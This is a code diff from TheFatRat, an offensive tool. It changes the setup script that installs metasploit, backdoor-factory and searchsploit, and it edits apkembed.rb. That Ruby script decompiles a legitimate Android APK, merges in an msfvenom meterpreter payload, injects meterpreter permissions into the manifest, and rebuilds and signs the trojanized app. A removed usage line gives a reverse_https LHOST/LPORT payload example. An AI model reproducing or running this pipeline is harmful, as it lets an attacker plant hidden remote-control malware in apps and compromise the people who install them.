echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config
echo "********************************************************************************************************" >> $config
echo "msfconsole" | tee -a $config $log > /dev/null 2>&1
echo "msfvenom" | tee -a $config $log > /dev/null 2>&1
sleep 2
else
echo ""
echo "[ X ] metasploit-framework -> not found ]"
echo "[ X ] metasploit-framework -> not found "
# Providing manual input to user in case metasploit was installed from git and is not on system path
echo ""
@ -237,39 +370,39 @@ read -p "Press Y/y to config metasploit-framework path or N/n to install it from
case "$choice" in
y|Y)
rm -f config.path
touch config.path
echo "********************************************************************************************************" >> config.path
echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path
echo "********************************************************************************************************" >> config.path
rm -f $config
touch $config
echo "********************************************************************************************************" >> $config
echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config
echo "********************************************************************************************************" >> $config
clear
echo "Enter the path of your Metasploit Instalation or just press enter for default config ."
echo -e $white "Ex:(/opt/metasploit-framework)";
read -p "Path:" msfc
echo -e $white "Enter the path of your Metasploit Instalation or just press enter for default config :
ex:(/opt/metasploit-framework)";
read -p "Path: " msfc
if [[ -z "$msfc" ]]; then
echo "msfconsole" >> config.path
echo "msfvenom" >> config.path
echo "msfconsole" | tee -a $config $log > /dev/null 2>&1
echo "msfvenom" | tee -a $config $log > /dev/null 2>&1
else
echo "ruby $msfc/msfconsole" >> config.path
echo "ruby $msfc/msfvenom" >> config.path
echo "ruby $msfc/msfconsole" | tee -a $config $log > /dev/null 2>&1
echo "ruby $msfc/msfvenom" | tee -a $config $log > /dev/null 2>&1
fi
;;
n|N)
echo "[ ! ] Installing metasploit-framework from kali repositories ]"
echo "[ ! ] Installing metasploit-framework from kali repositories "
xterm -T "☣ INSTALL METASPLOIT-FRAMEWORK ☣" -geometry 100x30 -e "sudo apt-get install metasploit-framework --force-yes -y"
echo "[ ✔ ] Done installing ...."
rm -f config.path
touch config.path
echo "********************************************************************************************************" >> config.path
echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path
echo "********************************************************************************************************" >> config.path
rm -f $config
touch $config
echo "********************************************************************************************************" >> $config
echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config
echo "********************************************************************************************************" >> $config
# adding the msf startups automatically to config file
echo "msfconsole" >> config.path
echo "msfvenom" >> config.path
echo "msfconsole" | tee -a $config $log > /dev/null 2>&1
echo "msfvenom" | tee -a $config $log > /dev/null 2>&1
;;
*)
@ -282,25 +415,24 @@ fi
which backdoor-factory > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Backdoor-Factory..................[ found ]"
echo "backdoor-factory" >> config.path
echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1
sleep 2
else
echo "[ X ] backdoor-factory -> not found ]"
echo "[ X ] backdoor-factory -> not found "
echo ""
echo -e $white "[This script requires backdoor-factory
, do you want to setup its path manually ?]";
echo -e $white "[This script requires backdoor-factory , do you want to setup its path manually ?]";
read -p "[Press Y/y to setup backdoor-factory path or N/n to install it from Kali repositories . ]" choice1
case "$choice1" in
y|Y )
clear
echo -e $white "Enter the path for backdoor.py ex:(/opt/backdoor-factory/backdoor.py)
, or just press [ENTER] for default config : ";
read -p "Path:" backdoor
echo -e $white "Enter the path for backdoor.py , or just press [ENTER] for default config :
ex:(/opt/backdoor-factory/backdoor.py)";
read -p "Path: " backdoor
if [[ -z "$backdoor" ]]; then
echo "backdoor-factory" >> config.path
echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1
else
echo "python2 $backdoor" >> config.path
echo "python2 $backdoor" | tee -a $config $log > /dev/null 2>&1
fi
;;
@ -308,7 +440,7 @@ fi
echo "[ ! ] Installing backdoor-factory from kali repositories ]"
xterm -T "☣ INSTALL BACKDOOR-FACTORY ☣" -geometry 100x30 -e "sudo apt-get install backdoor-factory --force-yes -y"
echo "[ ✔ ] Done installing ...."
echo "backdoor-factory" >> config.path
echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1
;;
*)
@ -316,13 +448,12 @@ echo "Invalid Input (Choose y/Y or n/N only)"
;;
esac;
fi
sleep 2
# check if searchsploit exists
which searchsploit > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Searchsploit......................[ found ]"
echo "searchsploit" >> config.path
echo "searchsploit" | tee -a $config $log > /dev/null 2>&1
sleep 2
else
echo "[ X ] searchsploit -> not found]"
@ -333,13 +464,13 @@ case "$choice2" in
y|Y )
clear
echo -e $yellow "Enter the path for searchsploit ex:(/opt/searchsploit/searchsploit)
, or just press [ENTER] for default config : "
echo -e $white "Enter the path for searchsploit , or just press [ENTER] for default config :
ex:(/opt/searchsploit/searchsploit) "
read -p "Path: " searchsploit
if [[ -z "$searchsploit" ]]; then
echo "searchsploit" >> config.path
echo "searchsploit" | tee -a $config $log > /dev/null 2>&1
else
echo "bash $searchsploit" >> config.path
echo "bash $searchsploit" | tee -a $config $log > /dev/null 2>&1
fi
;;
@ -347,7 +478,7 @@ n|N )
echo "[ ! ] Installing searchsploit from kali repositories ]"
xterm -T "☣ INSTALL SEARCHSPLOIT ☣" -geometry 100x30 -e "sudo apt-get install exploitdb --force-yes -y"
echo "[ ✔ ] Done installing ...."
echo "searchsploit" >> config.path
echo "searchsploit" | tee -a $config $log > /dev/null 2>&1
sleep 2
echo ""
echo "Configuration and tool installed with success!";
@ -383,7 +514,7 @@ rm -f /usr/local/sbin/fatrat
touch /usr/local/sbin/fatrat
echo "#!/bin/bash" > /usr/local/sbin/fatrat
echo $scrp >> /usr/local/sbin/fatrat
chmod +x /usr/local/sbin/fatrat
chmod +x /usr/local/sbin/fatrat
clear
echo "";
echo "[ ]====================================================================[ ]";
@ -391,6 +522,7 @@ echo "";
echo "[ ]====================================================================[ ]";
echo "";
chmod +x fatrat
which fatrat >> $log 2>&1
sleep 2
;;

31
tools/apkembed.rb
View File

@ -89,8 +89,8 @@ def fix_manifest()
}
original_permissions=[]
apk_mani=''
#Load original apk's permissions
#Load original apk's permissions
File.open("output/original/AndroidManifest.xml","r"){|file2|
k=File.read(file2)
apk_mani=k
@ -152,29 +152,6 @@ unless(apk_v.split()[1].include?("v2."))
exit(1)
end
begin
msfvenom_opts = ARGV[1,ARGV.length]
opts=""
msfvenom_opts.each{|x|
opts+=x
opts+=" "
}
rescue
puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
puts "[-] Error parsing msfvenom options. Exiting.\n"
exit(1)
end
print "[*] Generating msfvenom payload..\n"
res=`msfvenom -f raw #{opts} -o output/payload.apk `
if res.downcase.include?("invalid" || "error")
puts res
exit(1)
end
print "[*] Signing payload..\n"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA 'output/payload.apk' androiddebugkey`
@ -183,7 +160,7 @@ print "[*] Signing payload..\n"
`cp #{apkfile} output/original.apk`
print "[*] Decompiling orignal APK..\n"
print "[*] Decompiling original APK..\n"
`apktool d output/original.apk -o output/original`
print "[*] Decompiling payload APK..\n"
`apktool d output/payload.apk -o output/payload`
@ -226,7 +203,7 @@ print "[*] Poisoning the manifest with meterpreter permissions..\n"
fix_manifest()
print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
`apktool b -o output/#{injected_apk} output/original`
`apktool b -o #{injected_apk} output/original`
print "[*] Signing #{injected_apk} ..\n"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey`